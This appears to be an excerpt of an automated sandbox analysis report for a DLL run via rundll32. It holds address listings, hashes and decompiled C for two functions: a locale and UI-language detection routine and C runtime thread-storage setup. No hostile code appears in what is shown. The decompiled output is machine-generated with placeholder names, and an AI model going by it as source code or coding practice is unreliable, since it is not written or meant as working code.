                                                                                                        0x100108b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100108bf
                                                                                                        0x100108c2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100108c9
                                                                                                        0x100108cc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100108d5
                                                                                                        0x100108d8
                                                                                                        0x100108db
                                                                                                        0x100108dc
                                                                                                        0x100108df
                                                                                                        0x100108e0
                                                                                                        0x100108e3
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100108ed
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100108f2
                                                                                                        0x100108f3
                                                                                                        0x100108f3
                                                                                                        0x100108f8
                                                                                                        0x100108f8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010900
                                                                                                        0x10010901
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010906
                                                                                                        0x10010909
                                                                                                        0x1001090c
                                                                                                        0x1001090f
                                                                                                        0x10010910
                                                                                                        0x10010910
                                                                                                        0x10010914
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001091b
                                                                                                        0x1001091f
                                                                                                        0x10010924
                                                                                                        0x10010924
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001092a
                                                                                                        0x1001092d
                                                                                                        0x1001092f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010936
                                                                                                        0x10010939
                                                                                                        0x1001093c
                                                                                                        0x1001093f
                                                                                                        0x10010942
                                                                                                        0x10010945
                                                                                                        0x10010948
                                                                                                        0x1001094b
                                                                                                        0x1001095c
                                                                                                        0x1001095d
                                                                                                        0x10010964
                                                                                                        0x10010964
                                                                                                        0x10010966
                                                                                                        0x00000000
                                                                                                        0x10010966
                                                                                                        0x10010953
                                                                                                        0x10010954
                                                                                                        0x10010957
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001096d
                                                                                                        0x1001096e
                                                                                                        0x1001096e
                                                                                                        0x10010970
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010997
                                                                                                        0x10010998
                                                                                                        0x1001099b
                                                                                                        0x1001099d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010722
                                                                                                        0x10010725
                                                                                                        0x10010728
                                                                                                        0x1001072b
                                                                                                        0x1001072c
                                                                                                        0x1001072c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010974
                                                                                                        0x10010977
                                                                                                        0x10010978
                                                                                                        0x10010978
                                                                                                        0x1001097b
                                                                                                        0x1001097b
                                                                                                        0x1001097c
                                                                                                        0x10010980
                                                                                                        0x10010980
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010983
                                                                                                        0x10010986
                                                                                                        0x10010989
                                                                                                        0x1001098c
                                                                                                        0x1001098d
                                                                                                        0x1001098d
                                                                                                        0x1001098e
                                                                                                        0x10010991
                                                                                                        0x10010991
                                                                                                        0x10010993
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100109a4
                                                                                                        0x100109a7
                                                                                                        0x100109aa
                                                                                                        0x100109ad
                                                                                                        0x100109ae
                                                                                                        0x100109b2
                                                                                                        0x100109b5
                                                                                                        0x100109b6
                                                                                                        0x100109ba
                                                                                                        0x100109bb
                                                                                                        0x100109bd
                                                                                                        0x100109bf
                                                                                                        0x10010568
                                                                                                        0x10010568
                                                                                                        0x1001056a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100109c7
                                                                                                        0x100109c9
                                                                                                        0x100109cb
                                                                                                        0x100109cd
                                                                                                        0x100109d0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001070c
                                                                                                        0x1001070c
                                                                                                        0x10010713
                                                                                                        0x10010718
                                                                                                        0x10010718
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100106af
                                                                                                        0x100106fd
                                                                                                        0x10010700
                                                                                                        0x10010700
                                                                                                        0x10010700
                                                                                                        0x10010707
                                                                                                        0x00000000
                                                                                                        0x10010707
                                                                                                        0x1001062f
                                                                                                        0x10010631
                                                                                                        0x10010634
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010636
                                                                                                        0x1001063c
                                                                                                        0x1001063f
                                                                                                        0x10010644
                                                                                                        0x10010646
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001064c
                                                                                                        0x10010653
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010655
                                                                                                        0x100105ad
                                                                                                        0x100105b1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100105b3
                                                                                                        0x100105b9
                                                                                                        0x100105c3
                                                                                                        0x100105c3
                                                                                                        0x100105c9
                                                                                                        0x100105d3
                                                                                                        0x100105d9
                                                                                                        0x100105dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100105de
                                                                                                        0x100105ec
                                                                                                        0x100105f2
                                                                                                        0x100105f4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100105f4
                                                                                                        0x100105cb
                                                                                                        0x100105d1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100105d1
                                                                                                        0x100105bb
                                                                                                        0x100105c1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010592
                                                                                                        0x1001059d
                                                                                                        0x100105a2
                                                                                                        0x100105a4
                                                                                                        0x1001053a
                                                                                                        0x1001053a
                                                                                                        0x100109f3
                                                                                                        0x100109f3
                                                                                                        0x100109f8
                                                                                                        0x100109fd
                                                                                                        0x100109fd
                                                                                                        0x100109ff
                                                                                                        0x10010a06
                                                                                                        0x10010a0d
                                                                                                        0x1001071a
                                                                                                        0x1001071f
                                                                                                        0x1001071f
                                                                                                        0x00000000
                                                                                                        0x100105a4
                                                                                                        0x10010590
                                                                                                        0x1001054b
                                                                                                        0x1001054e
                                                                                                        0x10010550
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001055b
                                                                                                        0x1001055c
                                                                                                        0x1001055d
                                                                                                        0x10010562
                                                                                                        0x00000000
                                                                                                        0x10010562
                                                                                                        0x10010524
                                                                                                        0x10010529
                                                                                                        0x10010534
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3
                                                                                                        • String ID:
                                                                                                        • API String ID: 431132790-0
                                                                                                        • Opcode ID: d11018b4642b23ca6353badaaefc791d62fc55ff40abd891af88606a4718e362
                                                                                                        • Instruction ID: da668afba43dcbf613a1531e198d6df2431545f57b1d6681437081d5cb9465c4
                                                                                                        • Opcode Fuzzy Hash: d11018b4642b23ca6353badaaefc791d62fc55ff40abd891af88606a4718e362
                                                                                                        • Instruction Fuzzy Hash: 36F1937460024AEFEB14CF54CC90ABE77A9FF04354F108519F895AF292DBB4EA81DB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10026DFF, Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229registrylibraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 84%
                                                                                                        			E10026DFF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x10072650; // 0xb5e27fef
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E1003EE82(0x1005542e, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, 0x10026439, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E1003AA04( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E1003E9B0(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x10000000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E1002644F(_t181 - 0x3c, 0x10000000, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E100264FF(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E10026535(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E10026BA9(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E10026ADC(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]);
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E10039F21(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}
































                                                                                                        0x10026dff
                                                                                                        0x10026e00
                                                                                                        0x10026e06
                                                                                                        0x10026e0a
                                                                                                        0x10026e11
                                                                                                        0x10026e17
                                                                                                        0x10026e1e
                                                                                                        0x10026e2f
                                                                                                        0x10026e36
                                                                                                        0x10026e39
                                                                                                        0x10026e3c
                                                                                                        0x10026e3f
                                                                                                        0x10026e4d
                                                                                                        0x10026e50
                                                                                                        0x10026e54
                                                                                                        0x10026f22
                                                                                                        0x10026fde
                                                                                                        0x10026fe2
                                                                                                        0x10026ff6
                                                                                                        0x10026ff9
                                                                                                        0x10027003
                                                                                                        0x10027009
                                                                                                        0x10027021
                                                                                                        0x1002702d
                                                                                                        0x10027032
                                                                                                        0x10027035
                                                                                                        0x10027035
                                                                                                        0x10027003
                                                                                                        0x10026f28
                                                                                                        0x10026f3c
                                                                                                        0x10026f47
                                                                                                        0x10026f5d
                                                                                                        0x10026f6c
                                                                                                        0x10026f84
                                                                                                        0x10026f89
                                                                                                        0x10026f8f
                                                                                                        0x10026f9b
                                                                                                        0x10026f9e
                                                                                                        0x10026fb0
                                                                                                        0x10026fbc
                                                                                                        0x10026fc1
                                                                                                        0x10026fc4
                                                                                                        0x10026fc4
                                                                                                        0x10026f8f
                                                                                                        0x10026fce
                                                                                                        0x10026fce
                                                                                                        0x10026f47
                                                                                                        0x10026e5a
                                                                                                        0x10026e62
                                                                                                        0x10026e65
                                                                                                        0x10026e68
                                                                                                        0x10026e7a
                                                                                                        0x10026e83
                                                                                                        0x10026e8b
                                                                                                        0x10026e98
                                                                                                        0x10026e9b
                                                                                                        0x10026ea2
                                                                                                        0x10026ea6
                                                                                                        0x10026eaa
                                                                                                        0x10026ead
                                                                                                        0x10026eb0
                                                                                                        0x10026ebd
                                                                                                        0x10026ec9
                                                                                                        0x10026ece
                                                                                                        0x10026ed1
                                                                                                        0x10026ed1
                                                                                                        0x10026ed8
                                                                                                        0x10026ed8
                                                                                                        0x10026edd
                                                                                                        0x10026ee0
                                                                                                        0x10026ef7
                                                                                                        0x10026efe
                                                                                                        0x10026f0d
                                                                                                        0x10027043
                                                                                                        0x1002704a
                                                                                                        0x1002705a
                                                                                                        0x1002705d
                                                                                                        0x10027060
                                                                                                        0x10027067
                                                                                                        0x1002706a
                                                                                                        0x10027071
                                                                                                        0x1002707d
                                                                                                        0x10027087
                                                                                                        0x1002708c
                                                                                                        0x1002708c
                                                                                                        0x10027091
                                                                                                        0x10027096
                                                                                                        0x100270b3
                                                                                                        0x100270b3
                                                                                                        0x100270ba
                                                                                                        0x100270bf
                                                                                                        0x00000000
                                                                                                        0x10027098
                                                                                                        0x10027098
                                                                                                        0x1002709f
                                                                                                        0x100270a7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100270a9
                                                                                                        0x100270ad
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100270af
                                                                                                        0x100270b1
                                                                                                        0x00000000
                                                                                                        0x100270b1
                                                                                                        0x10026f13
                                                                                                        0x10026f13
                                                                                                        0x100270c1
                                                                                                        0x100270c4
                                                                                                        0x100270cc
                                                                                                        0x100270cd
                                                                                                        0x100270ce
                                                                                                        0x100270e3
                                                                                                        0x100270e3

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 10026E1E
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10026E3F
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10026E50
                                                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 10026E86
                                                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 10026E8E
                                                                                                        • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10026EA2
                                                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 10026EC6
                                                                                                        • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10026ECC
                                                                                                        • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10026F05
                                                                                                        • GetVersion.KERNEL32 ref: 10026F1A
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10026F3F
                                                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 10026F64
                                                                                                        • _sscanf.LIBCMT ref: 10026F84
                                                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 10026FB9
                                                                                                        • ConvertDefaultLocale.KERNEL32(73B74EE0), ref: 10026FBF
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 10026FCE
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10026FDE
                                                                                                        • EnumResourceLanguagesA.KERNEL32 ref: 10026FF9
                                                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 1002702A
                                                                                                        • ConvertDefaultLocale.KERNEL32(73B74EE0), ref: 10027030
                                                                                                        • _memset.LIBCMT ref: 1002704A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                        • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                        • API String ID: 434808117-483790700
                                                                                                        • Opcode ID: a8765283e7a25c69eeaeef6d3af8989df0186295ff9f432bddb89f173f0720fe
                                                                                                        • Instruction ID: 88979602e1e95ec442f5de29852bd6d26d68516f4700fd9df8ca4acbe0c86424
                                                                                                        • Opcode Fuzzy Hash: a8765283e7a25c69eeaeef6d3af8989df0186295ff9f432bddb89f173f0720fe
                                                                                                        • Instruction Fuzzy Hash: B6815FB5D002699FDB50DFA5EC84AFEBBF9FB48300F50052AE955E3280DB749A45CB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10045C4C, Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 91%
                                                                                                        			E10045C4C(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x10099a74 = GetProcAddress(_t37, "FlsAlloc");
					 *0x10099a78 = GetProcAddress(_t37, "FlsGetValue");
					 *0x10099a7c = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x10099a74;
					_t40 = TlsSetValue;
					 *0x10099a80 = _t7;
					if( *0x10099a74 == 0) {
						L6:
						 *0x10099a78 = TlsGetValue;
						 *0x10099a74 = 0x10045903;
						 *0x10099a7c = _t40;
						 *0x10099a80 = TlsFree;
					} else {
						__eflags =  *0x10099a78;
						if( *0x10099a78 == 0) {
							goto L6;
						} else {
							__eflags =  *0x10099a7c;
							if( *0x10099a7c == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x10073004 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x10099a78);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E10040037();
							 *0x10099a74 = E10045834( *0x10099a74);
							 *0x10099a78 = E10045834( *0x10099a78);
							 *0x10099a7c = E10045834( *0x10099a7c);
							 *0x10099a80 = E10045834( *0x10099a80);
							_t18 = E100407A6();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E10045936();
								goto L15;
							} else {
								_push(E10045AC2);
								_t21 =  *((intOrPtr*)(E100458A0( *0x10099a74)))();
								__eflags = _t21 - 0xffffffff;
								 *0x10073000 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E10041721(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x10073000);
										__eflags =  *((intOrPtr*)(E100458A0( *0x10099a7c)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E10045973(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E10045936();
					return 0;
				}
			}
















                                                                                                        0x10045c4c
                                                                                                        0x10045c58
                                                                                                        0x10045c5c
                                                                                                        0x10045c7c
                                                                                                        0x10045c89
                                                                                                        0x10045c96
                                                                                                        0x10045c9b
                                                                                                        0x10045c9d
                                                                                                        0x10045ca4
                                                                                                        0x10045caa
                                                                                                        0x10045caf
                                                                                                        0x10045cc7
                                                                                                        0x10045ccc
                                                                                                        0x10045cd6
                                                                                                        0x10045ce0
                                                                                                        0x10045ce6
                                                                                                        0x10045cb1
                                                                                                        0x10045cb1
                                                                                                        0x10045cb8
                                                                                                        0x00000000
                                                                                                        0x10045cba
                                                                                                        0x10045cba
                                                                                                        0x10045cc1
                                                                                                        0x00000000
                                                                                                        0x10045cc3
                                                                                                        0x10045cc3
                                                                                                        0x10045cc5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10045cc5
                                                                                                        0x10045cc1
                                                                                                        0x10045cb8
                                                                                                        0x10045ceb
                                                                                                        0x10045cf1
                                                                                                        0x10045cf4
                                                                                                        0x10045cf9
                                                                                                        0x10045dcb
                                                                                                        0x10045dcb
                                                                                                        0x10045dcb
                                                                                                        0x10045cff
                                                                                                        0x10045d06
                                                                                                        0x10045d08
                                                                                                        0x10045d0a
                                                                                                        0x00000000
                                                                                                        0x10045d10
                                                                                                        0x10045d10
                                                                                                        0x10045d26
                                                                                                        0x10045d36
                                                                                                        0x10045d46
                                                                                                        0x10045d53
                                                                                                        0x10045d58
                                                                                                        0x10045d5d
                                                                                                        0x10045d5f
                                                                                                        0x10045dc6
                                                                                                        0x10045dc6
                                                                                                        0x00000000
                                                                                                        0x10045d61
                                                                                                        0x10045d61
                                                                                                        0x10045d72
                                                                                                        0x10045d74
                                                                                                        0x10045d77
                                                                                                        0x10045d7c
                                                                                                        0x00000000
                                                                                                        0x10045d7e
                                                                                                        0x10045d8a
                                                                                                        0x10045d8c
                                                                                                        0x10045d90
                                                                                                        0x00000000
                                                                                                        0x10045d92
                                                                                                        0x10045d92
                                                                                                        0x10045d93
                                                                                                        0x10045da7
                                                                                                        0x10045da9
                                                                                                        0x00000000
                                                                                                        0x10045dab
                                                                                                        0x10045dab
                                                                                                        0x10045dad
                                                                                                        0x10045dae
                                                                                                        0x10045db5
                                                                                                        0x10045dbb
                                                                                                        0x10045dbf
                                                                                                        0x10045dc3
                                                                                                        0x10045dc3
                                                                                                        0x10045da9
                                                                                                        0x10045d90
                                                                                                        0x10045d7c
                                                                                                        0x10045d5f
                                                                                                        0x10045d0a
                                                                                                        0x10045dcf
                                                                                                        0x10045c5e
                                                                                                        0x10045c5e
                                                                                                        0x10045c66
                                                                                                        0x10045c66

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,1003D0F4,?,?,00000001,?,?,1003D264,00000001,?,?,1006CD00,0000000C,1003D31E,?), ref: 10045C52
                                                                                                        • __mtterm.LIBCMT ref: 10045C5E
                                                                                                          • Part of subcall function 10045936: __decode_pointer.LIBCMT ref: 10045947
                                                                                                          • Part of subcall function 10045936: TlsFree.KERNEL32(00000022,1003D190,?,?,00000001,?,?,1003D264,00000001,?,?,1006CD00,0000000C,1003D31E,?), ref: 10045961
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,1003D264,00000001,?,?,1006CD00,0000000C,1003D31E,?), ref: 10045C74
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,1003D264,00000001,?,?,1006CD00,0000000C,1003D31E,?), ref: 10045C81
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,1003D264,00000001,?,?,1006CD00,0000000C,1003D31E,?), ref: 10045C8E
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,1003D264,00000001,?,?,1006CD00,0000000C,1003D31E,?), ref: 10045C9B
                                                                                                        • TlsAlloc.KERNEL32(?,?,00000001,?,?,1003D264,00000001,?,?,1006CD00,0000000C,1003D31E,?), ref: 10045CEB
                                                                                                        • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,1003D264,00000001,?,?,1006CD00,0000000C,1003D31E,?), ref: 10045D06
                                                                                                        • __init_pointers.LIBCMT ref: 10045D10
                                                                                                        • __encode_pointer.LIBCMT ref: 10045D1B
                                                                                                        • __encode_pointer.LIBCMT ref: 10045D2B
                                                                                                        • __encode_pointer.LIBCMT ref: 10045D3B
                                                                                                        • __encode_pointer.LIBCMT ref: 10045D4B
                                                                                                        • __decode_pointer.LIBCMT ref: 10045D6C
                                                                                                        • __calloc_crt.LIBCMT ref: 10045D85
                                                                                                        • __decode_pointer.LIBCMT ref: 10045D9F
                                                                                                        • __initptd.LIBCMT ref: 10045DAE
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 10045DB5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
